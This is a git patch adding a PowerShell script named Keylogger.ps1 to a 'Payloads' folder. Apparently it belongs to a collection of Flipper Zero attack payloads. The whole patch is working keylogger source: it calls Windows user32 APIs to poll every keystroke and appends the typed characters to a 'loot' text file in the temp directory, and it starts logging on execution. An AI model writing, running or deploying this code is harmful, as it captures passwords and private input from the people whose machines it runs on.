From 2488a38a91ce01f727b8a008b2933a1de519444f Mon Sep 17 00:00:00 2001
From: I-Am-Jakoby
Date: Thu, 22 Dec 2022 22:50:35 -0600
Subject: [PATCH] Create Keylogger.ps1
---
 Payloads/Flip-Keylogger/Keylogger.ps1 | 62 +++++++++++++++++++++++++++
 1 file changed, 62 insertions(+)
 create mode 100644 Payloads/Flip-Keylogger/Keylogger.ps1
diff --git a/Payloads/Flip-Keylogger/Keylogger.ps1 b/Payloads/Flip-Keylogger/Keylogger.ps1
new file mode 100644
index 0000000..98ed62b
--- /dev/null
+++ b/Payloads/Flip-Keylogger/Keylogger.ps1
@@ -0,0 +1,62 @@
+function XXXlog($Path="$env:temp\$env:UserName-loot.txt"){
+ $signatures = @'
+ [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
+ public static extern short GetAsyncKeyState(int virtualKeyCode);
+ [DllImport("user32.dll", CharSet=CharSet.Auto)]
+ public static extern int GetKeyboardState(byte[] keystate);
+ [DllImport("user32.dll", CharSet=CharSet.Auto)]
+ public static extern int MapVirtualKey(uint uCode, int uMapType);
+ [DllImport("user32.dll", CharSet=CharSet.Auto)]
+ public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
+'@
+
+ $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
+
+
+ $null = New-Item -Path $Path -ItemType File -Force
+
+ try
+ {
+ Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red
+
+ while ($true) {
+ Start-Sleep -Milliseconds 40
+
+
+ for ($ascii = 9; $ascii -le 254; $ascii++) {
+
+ $state = $API::GetAsyncKeyState($ascii)
+
+
+ if ($state -eq -32767) {
+ $null = [console]::CapsLock
+
+
+ $virtualKey = $API::MapVirtualKey($ascii, 3)
+
+
+ $kbstate = New-Object Byte[] 256
+ $checkkbstate = $API::GetKeyboardState($kbstate)
+
+
+ $mychar = New-Object -TypeName System.Text.StringBuilder
+
+ $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
+
+ if ($success)
+ {
+
+ [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
+ }
+ }
+ }
+ }
+ finally
+ {
+
+ #notepad $Path
+ }
+}
+
+XXXlog